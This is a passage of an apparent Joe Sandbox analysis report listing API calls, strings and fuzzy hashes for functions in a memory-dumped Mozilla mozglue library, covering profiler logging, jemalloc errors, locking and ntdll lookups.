                                                                    • Part of subcall function 6C639420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING,?,?,00000000,?,6C62F710,?,00000039,00000000,?,6C64138F,?,?,?), ref: 6C639470
                                                                    • Part of subcall function 6C639420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING,?,?,?,00000000,?,6C62F710,?,00000039,00000000,?,6C64138F,?,?,?), ref: 6C639482
                                                                    • Part of subcall function 6C639420: __Init_thread_footer.LIBCMT ref: 6C63949F
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C63F619
                                                                  • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000,?,6C63F598), ref: 6C63F621
                                                                    • Part of subcall function 6C6394D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C6394EE
                                                                    • Part of subcall function 6C6394D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,?,00000000,?), ref: 6C639508
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C63F637
                                                                  • AcquireSRWLockExclusive.KERNEL32(6C67F4B8,?,?,00000000,?,6C63F598), ref: 6C63F645
                                                                  • ReleaseSRWLockExclusive.KERNEL32(6C67F4B8,?,?,00000000,?,6C63F598), ref: 6C63F663
                                                                  Strings
                                                                  • [D %d/%d] profiler_remove_sampled_counter(%s), xrefs: 6C63F62A
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1868758897.000000006C5F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1868735691.000000006C5F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868818190.000000006C66D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868842850.000000006C67E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868864847.000000006C682000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c5f0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: getenv$CurrentExclusiveLockThread$AcquireInit_thread_footerRelease__acrt_iob_func__stdio_common_vfprintf_getpid
                                                                  • String ID: [D %d/%d] profiler_remove_sampled_counter(%s)
                                                                  • API String ID: 2848912005-753366533
                                                                  • Opcode ID: f0a48b9537b0a11d894ef07503cc71be76955a3bcbe841ea7032692c591e5ace
                                                                  • Instruction ID: 81cc1eafebda4cc43c04437a571b2f6d5cc4e7804a111a25545c16d4d856d46b
                                                                  • Opcode Fuzzy Hash: f0a48b9537b0a11d894ef07503cc71be76955a3bcbe841ea7032692c591e5ace
                                                                  • Instruction Fuzzy Hash: 9BF05475300224AFDB056F66888CD5A777DEFC729DF101855FA0983752CB7548068B7E
                                                                  APIs
                                                                  • strlen.API-MS-WIN-CRT-STRING-L1-1-0(<jemalloc>,?,?,?,?,6C62CFAE,?,?,?,6C5F31A7), ref: 6C6305FB
                                                                  • _write.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,<jemalloc>,00000000,6C62CFAE,?,?,?,6C5F31A7), ref: 6C630616
                                                                  • strlen.API-MS-WIN-CRT-STRING-L1-1-0(: (malloc) Error in VirtualFree(),?,?,?,?,?,?,?,6C5F31A7), ref: 6C63061C
                                                                  • _write.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,: (malloc) Error in VirtualFree(),00000000,?,?,?,?,?,?,?,?,6C5F31A7), ref: 6C630627
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1868758897.000000006C5F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1868735691.000000006C5F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868818190.000000006C66D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868842850.000000006C67E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868864847.000000006C682000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c5f0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: _writestrlen
                                                                  • String ID: : (malloc) Error in VirtualFree()$<jemalloc>
                                                                  • API String ID: 2723441310-2186867486
                                                                  • Opcode ID: cc83fc42e11f277e4cc761cd2c769c78c4e550bedbda7c78343416f44c725965
                                                                  • Instruction ID: ce4d127fc63f0d0ee67076c4bbc574dd447b1835f6827d1003e5c3809a28a314
                                                                  • Opcode Fuzzy Hash: cc83fc42e11f277e4cc761cd2c769c78c4e550bedbda7c78343416f44c725965
                                                                  • Instruction Fuzzy Hash: 82E08CE2A0116037FA142256AC86DBB761CDBC6534F080039FE0E93701E94AAD1A51FB
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1868758897.000000006C5F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1868735691.000000006C5F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868818190.000000006C66D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868842850.000000006C67E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868864847.000000006C682000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c5f0000_file.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 824cc510f6bb5b58c92e631501da7dca3e67afc56cfae0b131b2407e6c5b0eb4
                                                                  • Instruction ID: e97ad23efd7514bf7b4877377508ee009f3e38a269106c964c7f6ec111e0e36c
                                                                  • Opcode Fuzzy Hash: 824cc510f6bb5b58c92e631501da7dca3e67afc56cfae0b131b2407e6c5b0eb4
                                                                  • Instruction Fuzzy Hash: B5A15A70A00655CFDB28CF29C694B99FBF1BF89304F44866ED44AA7B00E735A945CFA4
                                                                  APIs
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C6514C5
                                                                  • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C6514E2
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C651546
                                                                  • InitializeConditionVariable.KERNEL32(?), ref: 6C6515BA
                                                                  • free.MOZGLUE(?), ref: 6C6516B4
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1868758897.000000006C5F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1868735691.000000006C5F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868818190.000000006C66D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868842850.000000006C67E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868864847.000000006C682000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c5f0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: CurrentThread$ConditionInitializeNow@Stamp@mozilla@@TimeV12@_Variablefree
                                                                  • String ID:
                                                                  • API String ID: 1909280232-0
                                                                  • Opcode ID: 212a208c1c822196c264d321568a9f2cbc8b79efa196e338c90dd48acafe8c2d
                                                                  • Instruction ID: e48757182ed1cd05f2ab4ca71e4b16e9f42f4be273c0a22d1ad9673b3846cf70
                                                                  • Opcode Fuzzy Hash: 212a208c1c822196c264d321568a9f2cbc8b79efa196e338c90dd48acafe8c2d
                                                                  • Instruction Fuzzy Hash: B161E071A007109FDB118F25C880BDAB7B0BF8A308F54891DED8A57701DB31E959CBAA
                                                                  APIs
                                                                  • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C649FDB
                                                                  • free.MOZGLUE(?,?), ref: 6C649FF0
                                                                  • free.MOZGLUE(?,?), ref: 6C64A006
                                                                  • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C64A0BE
                                                                  • free.MOZGLUE(?,?), ref: 6C64A0D5
                                                                  • free.MOZGLUE(?,?), ref: 6C64A0EB
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1868758897.000000006C5F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1868735691.000000006C5F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868818190.000000006C66D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868842850.000000006C67E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868864847.000000006C682000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c5f0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: free$StampTimeV01@@Value@mozilla@@
                                                                  • String ID:
                                                                  • API String ID: 956590011-0
                                                                  • Opcode ID: 01cc30e141b85765e5800d01e4c5961588bb603ac38a4c11e46076c2b400e376
                                                                  • Instruction ID: e62bbe0569f906d9b9acd18d0a1d42d36e0f3a636b495fad0deb8a7bd443be6e
                                                                  • Opcode Fuzzy Hash: 01cc30e141b85765e5800d01e4c5961588bb603ac38a4c11e46076c2b400e376
                                                                  • Instruction Fuzzy Hash: 5661DC759087019FC711CF18C48059AB3F5FF89329F50866DE8999BB02EB32E986CBC5
                                                                  APIs
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C64DC60
                                                                  • AcquireSRWLockExclusive.KERNEL32(?,?,?,6C64D38A,?), ref: 6C64DC6F
                                                                  • free.MOZGLUE(?,?,?,?,?,6C64D38A,?), ref: 6C64DCC1
                                                                  • ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,6C64D38A,?), ref: 6C64DCE9
                                                                  • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?,6C64D38A,?), ref: 6C64DD05
                                                                  • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000001,?,?,?,6C64D38A,?), ref: 6C64DD4A
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1868758897.000000006C5F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1868735691.000000006C5F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868818190.000000006C66D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868842850.000000006C67E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868864847.000000006C682000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c5f0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: ExclusiveLockStampTimeV01@@Value@mozilla@@$AcquireCurrentReleaseThreadfree
                                                                  • String ID:
                                                                  • API String ID: 1842996449-0
                                                                  • Opcode ID: 583007f54331eea1765d65e87f3bf9d19af0e20942b104d5921f18ccfb0954e4
                                                                  • Instruction ID: e77567803e6ac95bceea7c777330f033439e6e393f6f7ba9bf96fa7381637eeb
                                                                  • Opcode Fuzzy Hash: 583007f54331eea1765d65e87f3bf9d19af0e20942b104d5921f18ccfb0954e4
                                                                  • Instruction Fuzzy Hash: 32419CB5E00215CFCB04CFA9C88099AB7F6FF89308B658469DA05ABB10D731FC00CB98
                                                                  APIs
                                                                  • GetFileInformationByHandle.KERNEL32(00000000,?), ref: 6C62F480
                                                                    • Part of subcall function 6C5FF100: LoadLibraryW.KERNEL32(shell32,?,6C66D020), ref: 6C5FF122
                                                                    • Part of subcall function 6C5FF100: GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 6C5FF132
                                                                  • CloseHandle.KERNEL32(00000000), ref: 6C62F555
                                                                    • Part of subcall function 6C6014B0: wcslen.API-MS-WIN-CRT-STRING-L1-1-0(6C601248,6C601248,?), ref: 6C6014C9
                                                                    • Part of subcall function 6C6014B0: memcpy.VCRUNTIME140(?,6C601248,00000000,?,6C601248,?), ref: 6C6014EF
                                                                    • Part of subcall function 6C5FEEA0: memcpy.VCRUNTIME140(?,?,?), ref: 6C5FEEE3
                                                                  • CreateFileW.KERNEL32 ref: 6C62F4FD
                                                                  • GetFileInformationByHandle.KERNEL32(00000000), ref: 6C62F523
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1868758897.000000006C5F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1868735691.000000006C5F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868818190.000000006C66D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868842850.000000006C67E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868864847.000000006C682000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c5f0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: FileHandle$Informationmemcpy$AddressCloseCreateLibraryLoadProcwcslen
                                                                  • String ID: \oleacc.dll
                                                                  • API String ID: 2595878907-3839883404
                                                                  • Opcode ID: f6e002535f6a3fc9afaccbd27af25949db023e64768495d46e4e84ccb4bbc8c6
                                                                  • Instruction ID: 3f671e3c15f852fe5c5e2ef2f790824d446f2410b0158fdd9b89219824928fac
                                                                  • Opcode Fuzzy Hash: f6e002535f6a3fc9afaccbd27af25949db023e64768495d46e4e84ccb4bbc8c6
                                                                  • Instruction Fuzzy Hash: A541EF706087209FE324CF29C884A9BB3F4AF94318F104A1CF59097650EB34D949CFAB
                                                                  APIs
                                                                    • Part of subcall function 6C639420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,?,00000000,?,6C62F710,?,00000039,00000000,?,6C64138F,?,?,?), ref: 6C63945E
                                                                    • Part of subcall function 6C639420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING,?,?,00000000,?,6C62F710,?,00000039,00000000,?,6C64138F,?,?,?), ref: 6C639470
                                                                    • Part of subcall function 6C639420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING,?,?,?,00000000,?,6C62F710,?,00000039,00000000,?,6C64138F,?,?,?), ref: 6C639482
                                                                    • Part of subcall function 6C639420: __Init_thread_footer.LIBCMT ref: 6C63949F
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C63E047
                                                                  • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C63E04F
                                                                    • Part of subcall function 6C6394D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C6394EE
                                                                    • Part of subcall function 6C6394D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,?,00000000,?), ref: 6C639508
                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C63E09C
                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C63E0B0
                                                                  Strings
                                                                  • [I %d/%d] profiler_get_profile, xrefs: 6C63E057
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1868758897.000000006C5F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1868735691.000000006C5F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868818190.000000006C66D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868842850.000000006C67E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868864847.000000006C682000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c5f0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: getenv$free$CurrentInit_thread_footerThread__acrt_iob_func__stdio_common_vfprintf_getpid
                                                                  • String ID: [I %d/%d] profiler_get_profile
                                                                  • API String ID: 1832963901-4276087706
                                                                  • Opcode ID: eaf6e35506c2cf3bd23615f75a8abbd6360241059000d6fbb4d8c5912a77fca5
                                                                  • Instruction ID: 8f1f32cd4d137a62268e02552eae19d51e47ba2bc89f8cbbff507399b0a4fd1f
                                                                  • Opcode Fuzzy Hash: eaf6e35506c2cf3bd23615f75a8abbd6360241059000d6fbb4d8c5912a77fca5
                                                                  • Instruction Fuzzy Hash: AF21D074A001289FCF049F65C898AEEB7B5EF86308F142424E80A97741DB35AD19CBF9
                                                                  APIs
                                                                  • SetLastError.KERNEL32(00000000), ref: 6C657526
                                                                  • __Init_thread_footer.LIBCMT ref: 6C657566
                                                                  • __Init_thread_footer.LIBCMT ref: 6C657597
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1868758897.000000006C5F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1868735691.000000006C5F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868818190.000000006C66D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868842850.000000006C67E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868864847.000000006C682000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c5f0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: Init_thread_footer$ErrorLast
                                                                  • String ID: UnmapViewOfFile2$kernel32.dll
                                                                  • API String ID: 3217676052-1401603581
                                                                  • Opcode ID: 5b827b15924873701e9da7131207c9b8bdb0add795873dad8a58528fe10f558f
                                                                  • Instruction ID: 4d1b680db17091b48783b11310dddb568bcafda0bd801f1052edc5e5307b3062
                                                                  • Opcode Fuzzy Hash: 5b827b15924873701e9da7131207c9b8bdb0add795873dad8a58528fe10f558f
                                                                  • Instruction Fuzzy Hash: EC214831701011ABCB19CFAA9C84E993375EF47325F608D29D80587B80CB39A8118A7F
                                                                  APIs
                                                                  • EnterCriticalSection.KERNEL32(6C67F770,-00000001,?,6C66E330,?,6C61BDF7), ref: 6C65A7AF
                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,accelerator.dll,?,6C61BDF7), ref: 6C65A7C2
                                                                  • moz_xmalloc.MOZGLUE(00000018,?,6C61BDF7), ref: 6C65A7E4
                                                                  • LeaveCriticalSection.KERNEL32(6C67F770), ref: 6C65A80A
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1868758897.000000006C5F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1868735691.000000006C5F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868818190.000000006C66D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868842850.000000006C67E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868864847.000000006C682000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c5f0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalSection$EnterLeavemoz_xmallocstrcmp
                                                                  • String ID: accelerator.dll
                                                                  • API String ID: 2442272132-2426294810
                                                                  • Opcode ID: 99f66c7bf80d8e248bfbda11898a899c6c6d855a20489bb40cf9574de472316e
                                                                  • Instruction ID: 4e62920956795faef333ad87721eb7e733e1ccf3fd4a31f5a927f9c95abcf4cb
                                                                  • Opcode Fuzzy Hash: 99f66c7bf80d8e248bfbda11898a899c6c6d855a20489bb40cf9574de472316e
                                                                  • Instruction Fuzzy Hash: 5E018FB06003149F9B08CF5AE8C4C6177B8FB8A355B14846AE9098B712EB709800CBBA
                                                                  APIs
                                                                  • LoadLibraryW.KERNEL32(ntdll.dll,?,6C65748B,?), ref: 6C6575B8
                                                                  • GetProcAddress.KERNEL32(00000000,RtlNtStatusToDosError), ref: 6C6575D7
                                                                  • FreeLibrary.KERNEL32(?,6C65748B,?), ref: 6C6575EC
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1868758897.000000006C5F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1868735691.000000006C5F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868818190.000000006C66D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868842850.000000006C67E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868864847.000000006C682000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c5f0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: Library$AddressFreeLoadProc
                                                                  • String ID: RtlNtStatusToDosError$ntdll.dll
                                                                  • API String ID: 145871493-3641475894
                                                                  • Opcode ID: afb49935a152ce0b91e1b342dc98fb048b1c550c8c27ba125e8c30752df26bb7
                                                                  • Instruction ID: 52a4cf0a61a8862f87d1e4bfd297eb2fbdc79fdcd0ac2c035db048cb1bd1ef1e
                                                                  • Opcode Fuzzy Hash: afb49935a152ce0b91e1b342dc98fb048b1c550c8c27ba125e8c30752df26bb7
                                                                  • Instruction Fuzzy Hash: 0EE09AB1610361ABDB0A5BB3D8C8B017AF8EB46358F104C25EA05D1710EBB980528F3E
                                                                  APIs
                                                                  • LoadLibraryW.KERNEL32(ntdll.dll,?,6C657592), ref: 6C657608
                                                                  • GetProcAddress.KERNEL32(00000000,NtUnmapViewOfSection), ref: 6C657627
                                                                  • FreeLibrary.KERNEL32(?,6C657592), ref: 6C65763C
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1868758897.000000006C5F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1868735691.000000006C5F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868818190.000000006C66D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868842850.000000006C67E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868864847.000000006C682000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c5f0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: Library$AddressFreeLoadProc
                                                                  • String ID: NtUnmapViewOfSection$ntdll.dll
                                                                  • API String ID: 145871493-1050664331
                                                                  • Opcode ID: 19e4af2d281eb03318206f03a2d3d58c7a5f85f84dc006ba5d586cbebf87d54d
                                                                  • Instruction ID: 54994f6219f3f109e2804b62af654253ba37c0bea33dbf9c473f645e868f804d
                                                                  • Opcode Fuzzy Hash: 19e4af2d281eb03318206f03a2d3d58c7a5f85f84dc006ba5d586cbebf87d54d
                                                                  • Instruction Fuzzy Hash: A7E0BF706103619BDF0A9FB7E8D8B017AB8E756399F108D15EA05D1750E7B980118F3E
                                                                  APIs
                                                                  • memset.VCRUNTIME140(?,00000000,?,?,6C65BE49), ref: 6C65BEC4
                                                                  • RtlCaptureStackBackTrace.NTDLL ref: 6C65BEDE
                                                                  • memset.VCRUNTIME140(00000000,00000000,-00000008,?,6C65BE49), ref: 6C65BF38
                                                                  • RtlReAllocateHeap.NTDLL ref: 6C65BF83
                                                                  • RtlFreeHeap.NTDLL(6C65BE49,00000000), ref: 6C65BFA6
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1868758897.000000006C5F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1868735691.000000006C5F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868818190.000000006C66D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868842850.000000006C67E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868864847.000000006C682000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c5f0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: Heapmemset$AllocateBackCaptureFreeStackTrace
                                                                  • String ID:
                                                                  • API String ID: 2764315370-0
                                                                  • Opcode ID: 7f51a79f046bc67c1f35c4d61926fdb76ef1c5d08172d2638e0f524cf45c5371
                                                                  • Instruction ID: 864fd658def06bfa48683294c01246ce35775ca62cd9e4de29ba940766e869d6
                                                                  • Opcode Fuzzy Hash: 7f51a79f046bc67c1f35c4d61926fdb76ef1c5d08172d2638e0f524cf45c5371
                                                                  • Instruction Fuzzy Hash: D451AF71A002058FE710CF69CD80BAAB3A2FFC9314F794639D556A7B54D731F9168B84
                                                                  APIs
                                                                  • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001,?,?,6C63B58D,?,?,?,?,?,?,?,6C66D734,?,?,?,6C66D734), ref: 6C648E6E
                                                                  • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,?,6C63B58D,?,?,?,?,?,?,?,6C66D734,?,?,?,6C66D734), ref: 6C648EBF
                                                                  • free.MOZGLUE(?,?,?,?,6C63B58D,?,?,?,?,?,?,?,6C66D734,?,?,?), ref: 6C648F24
                                                                  • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,?,6C63B58D,?,?,?,?,?,?,?,6C66D734,?,?,?,6C66D734), ref: 6C648F46
                                                                  • free.MOZGLUE(?,?,?,?,6C63B58D,?,?,?,?,?,?,?,6C66D734,?,?,?), ref: 6C648F7A
                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,6C63B58D,?,?,?,?,?,?,?,6C66D734,?,?,?), ref: 6C648F8F
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1868758897.000000006C5F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1868735691.000000006C5F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868818190.000000006C66D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868842850.000000006C67E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868864847.000000006C682000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c5f0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: freemalloc
                                                                  • String ID:
                                                                  • API String ID: 3061335427-0
                                                                  • Opcode ID: cd2a7c9195d60e8454abd9284dc6243d04b3d05d28a553c3c4327df69d0227ce
                                                                  • Instruction ID: 8398c7d5aad043379e768f971baa558f27931b703da72f139c27faace5d624aa
                                                                  • Opcode Fuzzy Hash: cd2a7c9195d60e8454abd9284dc6243d04b3d05d28a553c3c4327df69d0227ce
                                                                  • Instruction Fuzzy Hash: 4A51C2B1A012168FEB14CF58D8807AEB7B2BF49348F15842AD916EB750E731F905CBD9
                                                                  APIs
                                                                  • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001,?,6C642620,?,?,?,6C6360AA), ref: 6C64284D
                                                                  • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,6C642620,?,?,?,6C6360AA), ref: 6C64289A
                                                                  • free.MOZGLUE(?,?,?,6C642620,?,?,?,6C6360AA), ref: 6C6428F1
                                                                  • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,6C642620,?,?,?,6C6360AA), ref: 6C642910
                                                                  • free.MOZGLUE(00000001,?,?,6C642620,?,?,?,6C6360AA), ref: 6C64293C
                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0(00200000,?,?,6C642620,?,?,?,6C6360AA), ref: 6C64294E
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1868758897.000000006C5F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1868735691.000000006C5F0000.00000002.00000001.01000000.00000008.sdmpDownload File
